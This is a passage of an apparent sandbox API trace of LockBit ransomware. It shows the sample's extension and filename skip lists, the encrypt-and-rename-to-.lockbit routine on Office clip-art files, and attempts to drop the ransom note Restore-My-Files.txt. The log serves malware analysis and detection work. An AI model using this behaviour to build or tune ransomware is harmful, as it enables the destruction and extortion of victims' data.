[0118.985] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.985] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.985] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00956_.WMF") returned 1 [0118.986] lstrcmpiW (lpString1="ntldr", lpString2="IN00956_.WMF") returned 1 [0118.986] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00956_.WMF") returned 1 [0118.986] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00956_.WMF") returned -1 [0118.986] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00956_.WMF") returned -1 [0118.986] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00956_.WMF") returned 1 [0118.986] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00956_.WMF") returned -1 [0118.986] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.986] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF") returned=".WMF" [0118.986] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.986] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.987] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.987] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.988] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.988] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.988] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.988] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.988] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.988] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.988] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.lockbit") returned 72 [0118.988] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00956_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0118.988] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.988] malloc (_Size=0x40068) returned 0x3ef0008 [0118.988] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1256) returned 1 [0118.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0118.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0118.989] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0120.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.531] malloc (_Size=0xa6) returned 0x77d7a8 [0120.531] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0120.531] free (_Block=0x77d7a8) [0120.531] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00956_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.531] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.531] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.531] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20e4b00, ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x20e4b00, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0xb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00957_.WMF", cAlternateFileName="")) returned 1 [0120.531] lstrcmpiW (lpString1=".", lpString2="IN00957_.WMF") returned -1 [0120.531] lstrcmpiW (lpString1="..", lpString2="IN00957_.WMF") returned -1 [0120.531] PathFindExtensionW (pszPath="IN00957_.WMF") returned=".WMF" [0120.531] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.532] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.532] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00957_.WMF") returned 1 [0120.533] lstrcmpiW (lpString1="ntldr", lpString2="IN00957_.WMF") returned 1 [0120.533] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00957_.WMF") returned 1 [0120.533] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00957_.WMF") returned -1 [0120.533] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00957_.WMF") returned -1 [0120.533] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00957_.WMF") returned 1 [0120.533] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00957_.WMF") returned -1 [0120.533] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.533] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF") returned=".WMF" [0120.533] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.533] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.533] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.534] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.534] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.lockbit") returned 72 [0120.534] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00957_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0120.535] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.535] malloc (_Size=0x40068) returned 0x3df0008 [0120.535] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2944) returned 1 [0120.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.535] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0120.536] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0120.536] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.537] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.538] malloc (_Size=0xa6) returned 0x77d7a8 [0120.538] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.538] free (_Block=0x77d7a8) [0120.538] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00957_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.538] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.538] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.539] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x61cf3090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x2178, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDST_01.MID", cAlternateFileName="")) returned 1 [0120.539] lstrcmpiW (lpString1=".", lpString2="INDST_01.MID") returned -1 [0120.539] lstrcmpiW (lpString1="..", lpString2="INDST_01.MID") returned -1 [0120.539] PathFindExtensionW (pszPath="INDST_01.MID") returned=".MID" [0120.539] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0120.539] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0120.539] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0120.540] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0120.540] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="INDST_01.MID") returned 1 [0120.540] lstrcmpiW (lpString1="ntldr", lpString2="INDST_01.MID") returned 1 [0120.540] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="INDST_01.MID") returned 1 [0120.540] lstrcmpiW (lpString1="bootsect.bak", lpString2="INDST_01.MID") returned -1 [0120.540] lstrcmpiW (lpString1="autorun.inf", lpString2="INDST_01.MID") returned -1 [0120.540] lstrcmpiW (lpString1="thumbs.db", lpString2="INDST_01.MID") returned 1 [0120.540] lstrcmpiW (lpString1="iconcache.db", lpString2="INDST_01.MID") returned -1 [0120.540] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.540] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID") returned=".MID" [0120.541] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0120.541] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0120.541] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0120.541] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.lockbit") returned 72 [0120.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0120.542] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.542] malloc (_Size=0x40068) returned 0x1ff1e60 [0120.542] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8568) returned 1 [0120.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0120.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0120.543] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, 